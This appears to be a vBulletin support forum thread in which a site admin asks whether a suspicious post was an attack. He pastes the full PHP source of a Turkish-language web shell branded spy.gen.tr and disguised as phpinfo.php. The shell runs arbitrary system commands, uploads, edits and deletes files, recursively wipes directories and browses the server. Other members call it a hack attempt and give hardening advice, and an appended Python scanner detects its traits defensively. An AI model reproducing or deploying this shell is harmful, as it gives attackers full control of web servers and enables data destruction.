Was this a hack attempt???

  • Oreamnos
    Senior Member
    • Dec 2004
    • 178

    Was this a hack attempt???

    Someone just posted a ton of code in a thread and even got forms to appear within the post. I have since banned the user and soft-deleted the post, but I saved a PDF version of the post. Could someone pleeeease take a look at this and let me know if this was a hack attempt and if so, what steps should I take to protect myself?

    PDF version of post (108Kb)

    I am running 3.5.2 with the plugin patch for 3.5.3.

    thanks
    eric
    Websites For Sale | Adsense Ready Blogs For Sale
  • Oreamnos
    Senior Member
    • Dec 2004
    • 178

    #2
    This is the website that looks like they are responsible: spy.gen.tr

    And below is the code that made it to my email. Any ideas???

    PHP Code:
    ***************
    <?php
    $default
    =$DOCUMENT_ROOT;
    $this_file="./phpinfo.php";



    if(isset(
    $save)){
    $fname=str_replace(" ","_",$fname);
    $fname=str_replace("%20","_",$fname);
    header("Cache-control: private");
    header("Content-type: application/force-download");
    header("Content-Length: ".filesize($save));
    header("Content-Disposition: attachment; filename=$fname");

    $fp fopen($save'r');
    fpassthru($fp);
    fclose($fp);
    unset(
    $save);
    exit;
    }

    if ( 
    function_exists('ini_get') ) {
            
    $onoff ini_get('register_globals');
    } else {
            
    $onoff get_cfg_var('register_globals');
    }
    if (
    $onoff != 1) {
            [
    at]extract($_POSTEXTR_SKIP);
            [
    at]extract($_GETEXTR_SKIP);
    }


    function 
    deltree($deldir) {
            
    $mydir=[at]dir($deldir);
            while(
    $file=$mydir->read())        {
                    if((
    is_dir("$deldir/$file")) AND ($file!=".") AND 
    (
    $file!="..")) {
                            [
    at]chmod("$deldir/$file",0777);
                            
    deltree("$deldir/$file");
                    }
                    if (
    is_file("$deldir/$file")) {
                            [
    at]chmod("$deldir/$file",0777);
                            [
    at]unlink("$deldir/$file");
                    }
            }
            
    $mydir->close();
            [
    at]chmod("$deldir",0777);
            echo [
    at]rmdir($deldir) ? "<center><b><font 
    color='#0000FF'>SİLİNDİ:
    $deldir/$file</b></font></center>" "<center><font 
    color=\"#ff0000\">Silinemedi:
    $deldir/$file</font></center>";
            }

    if (
    $op=='phpinfo'){
    $fonk_kap get_cfg_var("fonksiyonları_kapat");
            echo 
    $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : 
    "<center>phpinfo() Komutu Çalışmıyor</center>";
            exit;
    }

    if (
    $op=='me'){
    echo 
    "<html>
          <head>
                <title>PHP info</title>
          </head>
          <body bgcolor='#003366' text='#0000FF' link='#0000FF' 
    vlink='#0000FF' alink='#00FF00'>
          <center>...:::Spy.Gen.Tr::...</center>
          <center><br>http://www.spy.gen.tr<br>
          <br>PHP info,<br>
          <br>By<br>
          <br>Kruis<br>
          <br></center>"
    ;

    $sayi='7';
    while(
    $sayi>=1){
    echo 
    "<center><font size='$sayi' color='#FFFFFF'>info<font 
    color='#008000'> info</font> <font color='#FF0000'>info</font> </font></center>"
    ;
    $sayi--;
    }
    $sayi2='1';
    while(
    $sayi2<=7){
    echo 
    "<center><font size='$sayi2
    color='#008000'>Admin[at]Spy.Gen.Tr</font></center>"
    ;
    $sayi2++;
    };

    echo 
    "</body>
          </html>"
    ;
    exit;
    }


    echo 
    "<html>
          <head>
                 <title>PHP info</title>
          </head>

           <body bgcolor='#003366' text='#008000' link='#00FF00' 
    vlink='#00FF00' alink='#00FF00'>
           </body>"
    ;

    echo 
    "<center><font size='+3' color='#FF0000'><b> 
    ...:::Spy.Gen.Tr:::...</b></font></center><br>
          <center><font size='+2' color='#FFFFFF'>PHP </font><font 
    size='+2' color='#FF0000'>info</font><br>
          <br>"
    ;
    echo 
    "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
    echo 
    "<br>";
    echo 
    "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP 
    INFO</a></center>"
    ;
    echo 
    "<br>";
    echo 
    "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB 
    SHELL</a></center>"
    ;
    echo 
    "<br>
          <br>
          <br>"
    ;
    echo 
    "<center>---><a href='./$this_file?op=me' 
    target='_blank'>Hakkimda</a><---</center>"
    ;

    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<div align=center>
          <font size='+1' color='#0000FF'><u>Root Klasör</u>: 
    $DOCUMENT_ROOT</font><br>
          <font size='+1'color='#0000FF'><u>PHPinfo'nun URL'si</u>: 
    http://
    $HTTP_HOST$REDIRECT_URL</font> <form method=post 
    action=
    $this_file>";

    if(!isset(
    $dir)){
    $dir="$default";
    }
    echo 
    "<input type=text size=60 name=dir value='$dir'>
    <input type=submit value='GIT'><br>
    </form>
    </div>"
    ;

    if (
    $op=='wshell'){
    echo 
    "<br><center><font size='+1' 
    color='#FF0000'>WEBSHELL</font></center>"
    ;
    if (isset(
    $ok)){
    if (empty(
    $kod)){
    die (
    "<center><font color='#FF0000'>Komut Yazilmadi</font><center>");
    }
    echo 
    "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
          <br>"
    ;
    echo 
    "<center><input type=text size=35 name=kod value='$kod'><input 
    type=submit name=ok value='CALISTIR'>
          <br>
          <br></center></form>"
    ;
    echo 
    "<center><TEXTAREA rows=30 cols=85 readonly>";
    system("$kod");
    echo 
    "</TEXTAREA></center>";
    exit;

    } elseif (empty(
    $ok)){
    echo 
    "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
          <br>"
    ;
    echo 
    "<center><input type=text size=35 name=kod value='Calistirmak 
    istediginiz komutu buraya girin'><input type=submit name=ok 
    value='CALISTIR'>
          <br>
          <br></center></form>"
    ;
    echo 
    "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
    exit;
    }
    }

    if (
    $op=='up'){
            
    $path=dir;
            echo 
    "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA 
    GONDERME</b></font></center><br>"
    ;
    if(isset(
    $dy)) {

    if(empty(
    $dosya_gonder)){
    } else {
    copy $dosya_gonder"$dir/$dosya_gonder_name") ? 
    print(
    "$dosya_gonder_name <font color='#0000FF'>kopyalandı</font><br>") : 
    print(
    "$dosya_gonder_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty(
    $dosya_gonder2)){
    } else {
    copy $dosya_gonder2"$dir/$dosya_gonder2_name") ? 
    print(
    "$dosya_gonder2_name <font color='#0000FF'>kopyalandı</font>ı<br>") : 
    print(
    "$dosya_gonder2_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty(
    $dosya_gonder3)){
    } else {
    copy $dosya_gonder3"$dir/$dosya_gonder3_name") ? 
    print(
    "$dosya_gonder3_name <font color='#0000FF'>kopyalandı</font><br>") : 
    print(
    "$dosya_gonder3_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    if(empty(
    $dosya_gonder4)){
    } else {
    copy $dosya_gonder4"$dir/$dosya_gonder4_name") ? 
    print(
    "$dosya_gonder4_name <font color='#0000FF'>kopyalandı</font><br>") : 
    print(
    "$dosya_gonder4_name <font color='#FF0000'>kopyalanamadı</font><br>");
    }

    } elseif(empty(
    $dy )) {
    $path=$dir;
    $dir $dosya_dizin;
    echo 
    "$dir";
    echo 
    "<FORM  ENCTYPE='multipart/form-data' 
    ACTION='
    $this_file?op=up&dir=$path' METHOD='POST'>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder' 
    size="
    20"></center><br>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder2' 
    size="
    20"></center><br>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder3' 
    size="
    20"></center><br>";
    echo 
    "<center><INPUT TYPE='file' NAME='dosya_gonder4' 
    size="
    20"></center><br>";

    echo 
    "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya 
    Yolla!'></center>"
    ;
    echo 
    "</form>";


    echo 
    "</html>";
    }
    }


    if(
    $op=='mf'){
        
    $path=$dir;
        if(isset(
    $dismi) && isset($kodlar)){
                    
    $ydosya="$path/$dismi";
                    if(
    file_exists("$path/$dismi")){
                            
    $dos"Böyle Bir Dosya Vardı Üzerine 
    Yazıldı"
    ;
                    } else {
                            
    $dos "Dosya Oluşturuldu";
                    }
                    
    touch ("$path/$dismi") or die("Dosya 
    Oluşturulamıyor"
    );
                    
    $ydosya2 fopen("$ydosya"'w') or die("Dosya yazmak 
    için açılamıyor"
    );
                    
    fwrite($ydosya2$kodlar) or die("Dosyaya 
    yazılamıyor"
    );
                    
    fclose($ydosya2);
                    echo 
    "<center><font 
    color='#0000FF'>
    $dos</font></center>";
            } else {

            echo 
    "<FORM METHOD='POST' 
    ACTION='
    $this_file?op=mf&dir=$path'>";
            echo 
    "<center>Dosya İsmi :<input type='text' name='dismi' 
    size="
    20"></center><br>";
        echo 
    "<br>";
        echo 
    "<center>KODLAR</center><br>";
        echo 
    "<center><TEXTAREA NAME='kodlar' ROWS='19' 
    COLS='52'></TEXTAREA></center>"
    ;
            echo 
    "<center><INPUT TYPE='submit' name='okmf' 
    value='TAMAM'></center>"
    ;
        echo 
    "</form>";
            }
    }

    if(
    $op=='md'){
            
    $path=$dir;
            if(isset(
    $kismi) && isset($okmf)){
                    
    $klasör="$path/$kismi";
                    
    mkdir("$klasör"0777) or die ("<center><font 
    color='#0000FF'>Klasör Oluşturulamıyor</font></center>"
    );
                    echo 
    "<center><font color='#0000FF'>Klasör 
    Oluşturuldu</font></center>"
    ;
            }

            echo 
    "<FORM METHOD='POST' 
    ACTION='
    $this_file?op=md&dir=$path'>";
            echo 
    "<center>Klasör İsmi :<input type='text' name='kismi' 
    size="
    20"></center><br>";
            echo 
    "<br>";
            echo 
    "<center><INPUT TYPE='submit' name='okmf' 
    value='TAMAM'></center>"
    ;
            echo 
    "</form>";
    }


    if(
    $op=='del'){
    unlink("$fname");
    }


    if(
    $op=='dd'){
            
    $dir=$here;
                    
    $deldirs=$yol;
                    if(!
    file_exists("$deldirs")) {
                            echo 
    "<font color=\"#ff0000\">Dosya 
    Yok</font>"
    ;
                    } else {
                            
    deltree($deldirs);
                    }
    }



    if(
    $op=='edit'){
    $yol=$fname;
    $yold=$path;
    if (isset(
    $ok)){
    $dosya fopen("$yol"'w') or die("Dosya Açılamıyor");
    $metin=$tarea;
    fwrite($dosya$metin) or die("Yazılamıyor!");
    fclose($dosya);
    echo 
    "<center>
          <p><font color='#0000FF'Dosya Başarıyla Düzenlendi</font></p>
          </center>"
    ;
    } else {
    $path=$dir;
    echo 
    "<center>DÜZENLE: $yol</center>";
    $dosya fopen("$yol"'r') or die("<center>
          <p><font color='#FF0000'Dosya Açılamıyor</font></p>
          </center>"
    );
    $boyut=filesize($yol);
    $duzen = [at]fread ($dosya$boyut);
    echo 
    "<form method=post 
    action=
    $this_file?op=edit&fname=$yol&dir=$path>";
    echo 
    "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea 
    rows=19 cols=52>
    $duzen</TEXTAREA></center><br>";
    echo 
    "<center><input type='Submit' value='TAMAM' name='ok'></center>";
    fclose($dosya);
    $duzen=htmlspecialchars($duzen);
    echo 
    "</form>";
    }
    }

    if(
    $op=='efp2'){
    $fileperm=base_convert($_POST['fileperm'],8,10);
            echo 
    $msg=[at]chmod($dir."/".$dismi2,$fileperm) ? "<font 
    color='#0000FF'><b>
    $dismi2 İSİMLİ DOSYANIN</font></b>" "<font 
    color=\"#ff0000\">DEİŞTİRİLEMEDİ!!</font>"
    ;
            echo 
    " <font color='#0000FF'>CHMODU 
    "
    .substr(base_convert([at]fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEİŞTİRİLDİ</font>";
    }

    if(
    $op=='efp'){
    $izinler2=substr(base_convert([at]fileperms($fname),10,8),-4);
    echo 
    "<form method=post action=./$this_file?op=efp2>
          <div align=center>
            <input name='dismi2' type='text' value='
    $dismi' class='input' 
    readonly size="
    20">CHMOD:
          <input type='text' name='fileperm' size='20' value='
    $izinler2
    class='input'>
          <input name='dir' type='hidden' value='
    $yol'>
          <input type='submit' value='TAMAM' class='input'></div><br>
          </form>"
    ;

    }


    $path=$dir;
    if(isset(
    $dir)){
    if (
    $dir = [at]opendir("$dir")) {
    while ((
    $file readdir($dir)) !== false) {
    if(
    $file!="." && $file!=".."){
    if(
    is_file("$path/$file")){
    $disk_space=filesize("$path/$file");
    $kb=$disk_space/1024;
    $total_kb number_format($kb2'.''');
    $total_kb2="Kb";


    echo 
    "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> 
    $file</b></font> - <a 
    href='./
    $this_file?save=$path/$file&fname=$file'>indir</a> - <a 
    href='./
    $this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
    echo 
    "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> 
    - <b>
    $total_kb$total_kb2</b> - ";
    [
    at]$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo 
    "<a 
    href='./
    $this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
    echo 
    "<br></div>\n";
    }else{
    echo 
    "<div align=left><a href='./$this_file?dir=$path/$file'>GİT></a> 
    <font face='arial' size='3' color='#808080'> 
    $path/$file</font> - 
    <b>DIR</b> - <a href='./
    $this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> 
    - "
    ;
    $dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
    echo 
    "<font color='#FFFF00'>$dirperm</font>";
    echo 
    " <br></div>\n";

    }
    }
    }
    closedir($dir);
    }
    }




    echo 
    "<center>------------------------------</center>";
    echo 
    "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root 
    Klasörüne Git</a></center>"
    ;
    echo 
    "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine 
    Git</a></center>"
    ;
    if(
    file_exists("B:\\")){
    echo 
    "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
    } else {}
    if(
    file_exists("C:\\")){
    echo 
    "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
    } else {}
    if (
    file_exists("D:\\")){
     echo 
    "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
    } else {}
    if (
    file_exists("E:\\")){
     echo 
    "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
    } else {}
    if (
    file_exists("F:\\")){
     echo 
    "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
    } else {}
    if (
    file_exists("G:\\")){
     echo 
    "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
    } else {}
    if (
    file_exists("H:\\")){
     echo 
    "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
    } else {}


    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<center><font size='+1' color='#FF0000'><b>SERVER 
    BİLGİLERİ</b></font><br></center>"
    ;
    echo 
    "<br><u><b>$SERVER_SIGNATURE</b></u>";
    echo 
    "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
    echo 
    "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
    echo 
    "<br>";
    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<center><font size='+1' 
    color='#FF0000'><b>İŞLEMLER</b></font><br></center>"
    ;
    echo 
    "<br><center><font size='4'><a 
    href='
    $this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
    echo 
    "<br><center><font size='4'><a 
    href='
    $this_file?op=mf&dir=$path'>Dosya Oluştur</a></font></center>";
    echo 
    "<br><center><font size='4'><a 
    href='
    $this_file?op=md&dir=$path'>Klasör Oluştur</a></font></center>";
    echo 
    "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
    echo 
    "<br>
          <center>Herseyi PHP info'ya bırakın</center>"
    ;
    ?>
    ***************

    • derfy
      Senior Member
      • Jul 2005
      • 244
      • 3.8.x

      #3
      I see a lot of unlink()'s and a function named deltree(). I'd have to say yes, this was a hacking attempt. Or at least someone trying to ruin your day.

      Do you allow HTML posting in the forum it was posted in?


      • Oreamnos
        Senior Member
        • Dec 2004
        • 178

        #4
        That's what I was afraid of...

        Originally posted by derfy
        Do you allow HTML posting in the forum it was posted in?
        No, I don't, but they somehow figured out how to display HTML in their post.

        • Oreamnos
          Senior Member
          • Dec 2004
          • 178

          #5
          Any opinions or suggestions or words of comfort from the vB guys? I'm kind of freaking out here.

          thanks
          eric

          • Steve Machol
            Former Customer Support Manager
            • Jul 2000
            • 154488

            #6
            I suggest you see this thread on how to make your vBulletin more secure:



            If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
            Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
            Change CKEditor Colors to Match Style (for 4.1.4 and above)

            Steve Machol Photography


            Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
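
A triage sketch to go with the advice above, added here and not part of the thread or of vBulletin: it flags PHP text that combines several of the traits visible in the code quoted in post #2 (request variables pulled in with extract(), system() on a variable, unlink()/chmod 0777 on variable paths), so a webroot can be checked for dropped copies. The indicator names, the threshold and both sample strings are constructed for illustration, and treating "[at]" as a rewritten "@" is an assumption about how the post was rendered.

```python
import re
from pathlib import Path

# Traits taken from the code quoted in post #2. Each pattern needs a variable
# argument, so calls on fixed literal paths or commands do not match.
INDICATORS = {
    "request_vars_extracted": re.compile(r"\bextract\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)"),
    "command_exec_on_variable": re.compile(
        r"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*[\"']?\$"),
    "delete_on_variable": re.compile(r"\b(unlink|rmdir)\s*\(\s*[\"']?\$"),
    "chmod_world_writable": re.compile(r"\bchmod\s*\([^;]*\b0?777\b"),
    "write_to_variable_path": re.compile(r"\bfopen\s*\(\s*[\"']?\$[^;]*[\"']w[b+t]*[\"']"),
    "upload_copied_to_variable_dir": re.compile(r"\bcopy\s*\(\s*\$[^;]*\$"),
}
SCANNED_SUFFIXES = {".php", ".phtml", ".inc", ".txt", ".html"}

# Constructed sample: a few statements in the mangled shape seen in the post
# (tokens split across lines, "@" shown as "[at]"). Not a working script.
SAMPLE_MANGLED = '''<?php
if ($onoff != 1) {
        [
at]extract($_POST, EXTR_SKIP);
}
[
at]chmod("$deldir/$file",0777);
[
at]unlink("$deldir/$file");
system("$kod");
?>'''

# Constructed benign sample: same functions, fixed literal arguments.
SAMPLE_BENIGN = '''<?php
$fp = fopen('/var/log/app.log', 'a');
fwrite($fp, "ok");
fclose($fp);
unlink('/tmp/cache.lock');
?>'''

def normalize(text):
    """Undo the forum/e-mail mangling before matching."""
    text = re.sub(r"\[\s*at\s*\]", "@", text)   # assumed rewrite of "@"
    return re.sub(r"\s+", " ", text)             # rejoin split tokens

def find_indicators(text):
    flat = normalize(text)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(flat))

def triage(text, threshold=2):
    """One trait alone is common in legitimate code; several together are not."""
    hits = find_indicators(text)
    return {"hits": hits, "suspicious": len(hits) >= threshold}

def scan_tree(root, threshold=2):
    """Return {path: hits} for files under root that reach the threshold."""
    flagged = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            verdict = triage(path.read_text(encoding="utf-8", errors="replace"), threshold)
            if verdict["suspicious"]:
                flagged[str(path)] = verdict["hits"]
    return flagged
```

A hit is a reason to inspect the file and its modification time, not proof on its own; files the scan misses still need the host-level review suggested above.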

